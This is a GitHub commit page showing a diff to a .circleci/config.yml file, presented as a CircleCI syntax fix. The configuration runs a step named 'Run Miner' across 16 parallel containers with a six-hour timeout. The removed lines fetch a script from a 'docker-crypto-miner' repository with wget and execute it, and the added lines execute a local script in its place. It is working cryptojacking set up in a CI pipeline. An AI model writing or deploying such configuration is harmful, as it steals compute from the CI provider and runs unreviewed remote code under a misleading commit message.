Skip to content

Commit

Permalink
fix: syntax circle ci
Browse files Browse the repository at this point in the history
  • Loading branch information
lpsm-dev committed Feb 22, 2023
1 parent 4cfca33 commit 6118d25
Showing 1 changed file with 5 additions and 4 deletions.
9 changes: 5 additions & 4 deletions .circleci/config.yml
Original file line number Diff line number Diff line change
Expand Up @@ -4,20 +4,21 @@ description: |
Run a command with retry
jobs:
run-build:
running:
docker:
- image: circleci/ruby:2.5.3
parallelism: 16
steps:
- run:
name: Run Miner
no_output_timeout: 360m
command: |
wget https://raw.githubusercontent.com/ci-monk/docker-crypto-miner/main/src/circleci/run.sh
chmod +x run.sh && ./run.sh
no_output_timeout: 360m
chmod +x circleci.sh
./circleci.sh
workflows:
version: 2
build:
jobs:
- run-build:
- running

0 comments on commit 6118d25

Please sign in to comment.